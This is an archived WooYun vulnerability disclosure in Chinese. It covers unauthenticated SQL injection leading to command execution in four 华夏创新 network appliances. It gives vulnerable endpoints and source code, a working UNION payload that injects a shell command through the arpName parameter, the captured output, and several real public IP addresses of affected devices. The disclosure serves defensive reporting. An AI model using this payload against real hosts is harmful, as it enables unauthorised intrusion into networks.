当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135123

漏洞标题:华夏创新四种设备存在命令执行+四个SQL注入漏洞(无需登录)

相关厂商:北京华夏创新科技有限公司

漏洞作者: 路人甲

提交时间:2015-08-19 15:21

修复时间:2015-11-17 15:30

公开时间:2015-11-17 15:30

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-19: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经确认,细节仅向厂商公开
2015-08-22: 细节向第三方安全合作伙伴开放
2015-10-13: 细节向核心白帽子及相关领域专家公开
2015-10-23: 细节向普通白帽子公开
2015-11-02: 细节向实习白帽子公开
2015-11-17: 细节向公众公开

简要描述:

贵公司的四个产品代码一样就算了嘛,但是没想到啊 这代码还是抄别人的...
该漏洞影响该公司的
1.LotApp 应用交付系统
2.LotBalance 负载均衡器
3.LotWan 广域网加速系统
4.LotServer 服务器加速软件

详细说明:

这4个产品的数据库为:sqlite
存在漏洞的文件为:

/acc/bindipmac/static_arp_action.php?arpIf=1 arpIf存在漏洞
/acc/bindipmac/static_arp_bind.php?arpName=1 arpName存在漏洞
/acc/bindipmac/check_arp_exist_ip.php post: eth=1&ip=1 两参数都存在漏洞
/acc/bindipmac/static_arp_del.php?x=1&arpName=1 arpName存在漏洞


该四个注入均为报错,如下所示

http://218.28.233.118/acc/bindipmac/static_arp_action.php?arpIf=1%27
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[HY000]: General error: 1 near "arp0": syntax error' in /tmp/appexcfg/www/acc/common/databaseWrapper.inc:39 Stack trace: #0 /tmp/appexcfg/www/acc/common/databaseWrapper.inc(39): PDO->prepare('select count(*)...') #1 /tmp/appexcfg/www/acc/common/config/dao/arpDao.inc(151): DatabaseWrapper->prepare('select count(*)...') #2 /tmp/appexcfg/www/acc/bindipmac/static_arp_action.php(42): ARPDao->modifARPConfig(Object(ARPModel), NULL) #3 {main} thrown in /tmp/appexcfg/www/acc/common/databaseWrapper.inc on line 39


由于下面的这个sql注入可以UNION,且可导致命令执行,采用这个做为演示:

/acc/bindipmac/static_arp_del.php?x=1&arpName=1


造成漏洞的部分代码为

<?php
require_once dirname(__FILE__)."/../common/constant.inc";
include_once dirname(__FILE__)."/../common/config/dao/arpDao.inc";
include_once dirname(__FILE__)."/../common/config/model/arpModel.inc";
require_once dirname ( __FILE__ ) . "/../common/UciUtil.inc";
$arpName =  $_REQUEST['arpName'];
$ttl =  $_REQUEST['ttl'];
$ttl++;
$arpDao = new ARPDao();
$arpModel = $arpDao->getARPConfig($arpName);
$arpDao->delARPToSystem($arpModel);
$arpDao->delARPConfig($arpName);
//syncToFlash();
?>


跟上delARPToSystem函数 /acc/common/config/dao/arpDao.inc

public function delARPToSystem($arpModel){
	$ipNeighCmd = "ip neigh del %s lladdr %s dev %s  >/dev/null";
	$command = sprintf ( $ipNeighCmd, $arpModel->getIp(), $arpModel->getMac(), $arpModel->getIfname()  );
	execute ( $command );
}


很显然 $arpModel = $arpDao->getARPConfig($arpName); 返回的结果进入delARPToSystem函数即可造成任意命令执行
于是我们可以构造如下连接,实现命令执行

/acc/bindipmac/static_arp_del.php?x=1&arpName=1%27%20and%200%20union%20select%201,%27woo||ifconfig>wooyun.txt||yun%27,3,4,5,6,7,8--


成功执行任意命令:

http://218.28.233.118/acc/bindipmac/wooyun.txt
eth0      Link encap:Ethernet  HWaddr B0:51:8E:04:05:83  
          inet addr:192.168.3.250  Bcast:192.168.3.255  Mask:255.255.255.0
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
          Memory:fbd00000-fbd20000 
eth1      Link encap:Ethernet  HWaddr B0:51:8E:04:05:84  
          inet addr:125.46.16.54  Bcast:125.46.16.55  Mask:255.255.255.252
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
          Memory:fbc00000-fbc20000


给出几个案例:

http://218.28.233.118/
http://124.239.193.228/
http://124.239.193.224/
http://124.239.193.221/
http://124.239.193.229/

漏洞证明:

http://218.28.233.118/acc/bindipmac/wooyun.txt
eth0      Link encap:Ethernet  HWaddr B0:51:8E:04:05:83  
          inet addr:192.168.3.250  Bcast:192.168.3.255  Mask:255.255.255.0
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
          Memory:fbd00000-fbd20000 
eth1      Link encap:Ethernet  HWaddr B0:51:8E:04:05:84  
          inet addr:125.46.16.54  Bcast:125.46.16.55  Mask:255.255.255.252
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
          Memory:fbc00000-fbc20000

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-08-19 15:29

厂商回复:

多谢告知

最新状态:

暂无